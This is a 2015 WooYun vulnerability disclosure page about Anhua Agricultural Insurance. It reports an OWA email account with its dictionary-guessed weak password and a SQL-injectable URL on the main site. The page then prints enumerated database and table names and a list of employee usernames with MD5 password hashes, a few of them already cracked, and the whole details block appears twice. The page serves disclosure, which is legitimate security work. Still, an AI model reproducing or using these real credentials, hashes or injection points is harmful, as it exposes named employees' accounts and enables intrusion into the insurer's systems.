当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160181

漏洞标题:安华主站注入+弱密码(泄漏大量敏感文件)

相关厂商:安华农业保险股份有限公司

漏洞作者: 路人甲

提交时间:2015-12-11 11:56

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:后台弱口令

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-11: 细节已通知厂商并且等待厂商处理中
2015-12-15: 厂商已经确认,细节仅向厂商公开
2015-12-25: 细节向核心白帽子及相关领域专家公开
2016-01-04: 细节向普通白帽子公开
2016-01-14: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

安华主站注入+弱密码(泄漏大量敏感文件)

详细说明:

1>邮箱弱口令导致大量内部信息泄露
https://**.**.**.**/owa/
500人字典碰的
zhangyu
密码1qaz@WSX
密码改为了 Wooyun@123

1.png


2.png


3.png


4.png


红头文件

5.png


6.png


2>主站注入
http://**.**.**.**:7005/EbsWeb/getUnderwrite.do?firstFlag=true&UIAction=noticeQurey&id=1

1.png


available databases [16]:
[*] CARDIS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: CARDIS
[31 tables]
+-------------------+
| PRPDCODE          |
| PRPDCOMPANY       |
| PRPDCUSTOMER      |
| PRPDCUSTOMER_IDV  |
| PRPDENTRY         |
| PRPDPIGGRAINRATIO |
| PRPDRECMODE       |
| PRPDRECPRODUCT    |
| PRPDUSER          |
| PRPDUSERAPPEND    |
| PRPLITEMCAR       |
| PRPLMAIN          |
| PRPMAXNO          |
| PRPMAXUSE         |
| PRPNOTICE         |
| PRPTCONSULTATION  |
| PRPTENTRYPROPOSAL |
| PRPVOTEGROUP      |
| PRPVOTEITEMS      |
| PRPVOTER          |
| PRPVOTETITLE      |
| QUERYSTAT         |
| QUERYSTATDETAIL   |
| UWGRADE           |
| UWGROUP           |
| UWNOTION          |
| UWPRPINFO         |
| WFCONDITION       |
| WFLOG             |
| WFNODE            |
| WFPATH            |
+-------------------+
 
biwenjun	db1b8968b07e55542cef85fe9022be2b	   
hexu	b5808085361792d17946c11c7ad82030	   
ahbeijing	c786371811e379c5360d501cdc0e3e00	   
fcj123456	8211804ff70081d34eeaacbe6b778a44 (bj123456)	   
wshizhuang	bbd4b30a1884ea49517bdee7540f9dd6	   
kongxj	bbe3e4692ba0c2aeeb3b47beb129bba3	   
jltest	4ced573c7fbb7a74caa23c2668226679	   
huyanqun	34231bf817605a5e734f3a2327db7c15	   
AHGL	4ced573c7fbb7a74caa23c2668226679	   
ahshandong	31d1f88faa5fdbcf1b68dfab1aaf8028	   
test	25ab3b38f7afc116f18fa9821e44d561	   
ahjilin	bffe6bd41d183a450932be299309f3b7	   
ahneimeng	b5be656a7060dd3525027d6763c33ca0 (123456.)	   
ahliaoning	bbf3598962c88fce58c7237728e0adf4	   
erong	7724fd824828780c34b254db8c90b786	   
qqq	61eb78705e1abdcba88f4b3bbee35ef8	   
AHHG	25cdbf5cf4b4859d7861b094d25d1065	   
ahqingdao	d6f34743d49886d0d1adeae245c1f041	   
ÁőËŹ	ff14b085421e575f2fd533345a6d2dd2	   
wangrui	0e78ae5a25bb6c2d3ba7995e510fa0d2	   
lilu	a9c4fb03e941d3d22d3b60fb60a47791	   
lianyi	d32323fb0b9bb0b8f32be9d9181d5f29	   
liudan	58d56ff16e57ab535063377e1e745840	   
ŇŚÔś	2b412bb058cc13b99752377902d09ed2	   
wangyuehui	598ca18ed637ab366eafee944dfbcc84	   
duqinghua	01744c233bf0682053a1a27d3fe12180	   
liushuang	919478327f209faaef15fd7307259b62	   
wangyiwei	9d87b92bb3d4fc8f9e09bcae941f56ae	   
guozhenhua	cb6a6df8c4413b63943d4bfa5a0c7a17	   
zhangxi	dfd1bb9e1023e180b916089b53f52d65	   
zhaochangl	5001344ad35f5c7a0979355cd4246e44	   
wangyu	2c2384292b34486a3924b52b1d42cceb	   
lianxq	81dc9bdb52d04dc20036dbd8313ed055 (1234)


漏洞证明:

1>邮箱弱口令导致大量内部信息泄露
https://**.**.**.**/owa/
500人字典碰的
zhangyu
密码1qaz@WSX
密码改为了 Wooyun@123

1.png


2.png


3.png


4.png


红头文件

5.png


6.png


2>主站注入
http://**.**.**.**:7005/EbsWeb/getUnderwrite.do?firstFlag=true&UIAction=noticeQurey&id=1

1.png


available databases [16]:
[*] CARDIS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: CARDIS
[31 tables]
+-------------------+
| PRPDCODE          |
| PRPDCOMPANY       |
| PRPDCUSTOMER      |
| PRPDCUSTOMER_IDV  |
| PRPDENTRY         |
| PRPDPIGGRAINRATIO |
| PRPDRECMODE       |
| PRPDRECPRODUCT    |
| PRPDUSER          |
| PRPDUSERAPPEND    |
| PRPLITEMCAR       |
| PRPLMAIN          |
| PRPMAXNO          |
| PRPMAXUSE         |
| PRPNOTICE         |
| PRPTCONSULTATION  |
| PRPTENTRYPROPOSAL |
| PRPVOTEGROUP      |
| PRPVOTEITEMS      |
| PRPVOTER          |
| PRPVOTETITLE      |
| QUERYSTAT         |
| QUERYSTATDETAIL   |
| UWGRADE           |
| UWGROUP           |
| UWNOTION          |
| UWPRPINFO         |
| WFCONDITION       |
| WFLOG             |
| WFNODE            |
| WFPATH            |
+-------------------+
 
biwenjun	db1b8968b07e55542cef85fe9022be2b	   
hexu	b5808085361792d17946c11c7ad82030	   
ahbeijing	c786371811e379c5360d501cdc0e3e00	   
fcj123456	8211804ff70081d34eeaacbe6b778a44 (bj123456)	   
wshizhuang	bbd4b30a1884ea49517bdee7540f9dd6	   
kongxj	bbe3e4692ba0c2aeeb3b47beb129bba3	   
jltest	4ced573c7fbb7a74caa23c2668226679	   
huyanqun	34231bf817605a5e734f3a2327db7c15	   
AHGL	4ced573c7fbb7a74caa23c2668226679	   
ahshandong	31d1f88faa5fdbcf1b68dfab1aaf8028	   
test	25ab3b38f7afc116f18fa9821e44d561	   
ahjilin	bffe6bd41d183a450932be299309f3b7	   
ahneimeng	b5be656a7060dd3525027d6763c33ca0 (123456.)	   
ahliaoning	bbf3598962c88fce58c7237728e0adf4	   
erong	7724fd824828780c34b254db8c90b786	   
qqq	61eb78705e1abdcba88f4b3bbee35ef8	   
AHHG	25cdbf5cf4b4859d7861b094d25d1065	   
ahqingdao	d6f34743d49886d0d1adeae245c1f041	   
ÁőËŹ	ff14b085421e575f2fd533345a6d2dd2	   
wangrui	0e78ae5a25bb6c2d3ba7995e510fa0d2	   
lilu	a9c4fb03e941d3d22d3b60fb60a47791	   
lianyi	d32323fb0b9bb0b8f32be9d9181d5f29	   
liudan	58d56ff16e57ab535063377e1e745840	   
ŇŚÔś	2b412bb058cc13b99752377902d09ed2	   
wangyuehui	598ca18ed637ab366eafee944dfbcc84	   
duqinghua	01744c233bf0682053a1a27d3fe12180	   
liushuang	919478327f209faaef15fd7307259b62	   
wangyiwei	9d87b92bb3d4fc8f9e09bcae941f56ae	   
guozhenhua	cb6a6df8c4413b63943d4bfa5a0c7a17	   
zhangxi	dfd1bb9e1023e180b916089b53f52d65	   
zhaochangl	5001344ad35f5c7a0979355cd4246e44	   
wangyu	2c2384292b34486a3924b52b1d42cceb	   
lianxq	81dc9bdb52d04dc20036dbd8313ed055 (1234)


修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-15 11:29

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置。

最新状态:

暂无